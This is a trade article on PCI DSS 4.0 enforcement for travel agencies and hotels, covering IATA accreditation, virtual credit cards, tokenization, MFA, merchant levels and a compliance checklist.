PCI DSS 4.0 Is Now in Effect. Travel Merchants Who Lag Face Real Penalties.
The March 31, 2025 deadline has passed. PCI DSS 4.0 is now fully enforceable, and the travel industry is under particular scrutiny. With roughly 80% of hotel bookings involving card-not-present transactions and 40% of B2B travel payments now flowing through Virtual Credit Cards (VCCs), the sector presents both high volume and high risk.
The International Air Transport Association (IATA) now mandates that all accredited travel agencies demonstrate PCI DSS compliance. This is not a suggestion. It is a condition of accreditation, and non-compliant agents risk fines, merchant account freezes, and reputational damage that can cascade through airline partnerships and OTA relationships.
What Changed in PCI DSS 4.0
Version 4.0 replaces the 3.2.1 standard with 64 new requirements. The annual audit mentality is gone. Compliance is now continuous, and the burden of proof sits squarely with merchants.
The core shifts include:
- Continuous monitoring and quarterly penetration testing. Security is no longer a once-a-year checkbox. Systems must be tested, validated, and documented on an ongoing basis.
- Mandatory multi-factor authentication (MFA). Every administrator with access to cardholder data environments must use MFA without exception.
- Daily tamper detection. Booking engines and payment pages must automatically detect and flag unauthorized scripts or data injections.
- Enhanced tokenization. Full primary account numbers (PANs) can no longer sit in spreadsheets, PMS exports, or unencrypted files. If you can open an Excel file and see a full card number, you are out of compliance.
- Expanded scope. OTA integrations, GDS links, and cloud-based property management systems are now explicitly covered.
IATA Compliance Is Not Optional
IATA’s stance is clear: accredited travel agencies must comply with PCI DSS to protect payment data. The association has partnered with VikingCloud and other Qualified Security Assessors to simplify certification, but the responsibility remains with each agent.
Agencies that fail to comply face a predictable cascade of consequences:
- Card scheme fines passed down through acquirers
- Fraud losses and chargeback liability
- Termination of merchant accounts
- Loss of IATA accreditation
The IATA PCI DSS portal provides a step-by-step submission process, but documentation alone is not enough. Agents must add the technical controls, not just fill out the forms.
Virtual Credit Cards Add Complexity
VCCs have become the backbone of OTA-hotel reconciliation. They simplify commission tracking and reduce fraud exposure when implemented correctly. Under PCI DSS 4.0, VCCs carry the same compliance weight as physical cards.
Common failure points include:
- Downloading VCC details into unencrypted files or email
- Storing CVV codes beyond authorization
- Failing to match VCCs to booking references automatically
- Manual reconciliation processes that expose PANs
The fix is operational, not just technical. Hotels and agencies need automated tokenization, MFA-secured PMS environments, and real-time authorization holds at check-in to prevent duplicate or expired charges.
Compliance Pays for Itself
According to 2025 benchmarks from Antravia Advisory, tokenized, PCI 4.0-compliant travel businesses paid an average of 1.8% in interchange fees, compared with 2.9% for non-compliant merchants. Chargeback rates dropped from 1.8% to 0.6%. Audit costs fell by two-thirds.
IBM’s 2025 data breach report puts the average hospitality breach at $4.5 million. PCI fines can exceed $100,000 per month. The math is not complicated.
Merchant Levels and What They Mean
PCI DSS applies to all merchants, with no small-business exemption. The compliance burden scales with volume:
- Level 1: Over 6 million transactions annually. Full annual Report on Compliance (ROC) required.
- Level 2: 1 to 6 million transactions. Annual Self-Assessment Questionnaire (SAQ) plus regular network scans.
- Level 3: 20,000 to 1 million transactions. SAQ and quarterly vulnerability scans.
- Level 4: Under 20,000 transactions. Simplified SAQ A or SAQ A-EP depending on data handling.
Even small agencies processing a few thousand transactions annually must complete the SAQ and quarterly scans. There is no exemption for low volume.
What Travel Merchants Should Do Now
Map your data flow. Document exactly where card data enters, moves, and is stored. Include your PMS, OTA interfaces, payment gateways, and any manual processes.
Segment your networks. Card-processing systems must be isolated from general business networks, Wi-Fi, and email servers.
Enable MFA everywhere. PMS, booking engines, email platforms used for invoicing. No exceptions.
Deploy tokenization. If your systems handle live card data, you are in scope for SAQ D. If you use fully tokenized processors like Stripe or Adyen, you may qualify for the lighter SAQ A or A-EP.
Test continuously. Quarterly penetration tests, daily tamper checks on payment pages, and monthly VCC reconciliation with immediate investigation of mismatches.
Key Takeaways
- PCI DSS 4.0 enforcement began March 31, 2025. The grace period is over.
- IATA requires accredited travel agencies to comply. Non-compliance risks accreditation, fines, and merchant account termination.
- VCCs are treated as physical cards under the standard. Tokenization and MFA are mandatory.
- Compliance reduces interchange fees, chargebacks, and audit costs while protecting against breaches averaging $4.5 million.
- There is no small-business exemption. All merchants must validate compliance annually.
Travel merchants that treat PCI DSS 4.0 as a strategic operational discipline will gain a measurable cost and trust advantage. Those that treat it as paperwork risk fines, breaches, and lost partnerships. The choice is binary, and the deadline has passed.
Sources: Antravia Advisory, IATA PCI DSS Standards, PCI Security Standards Council
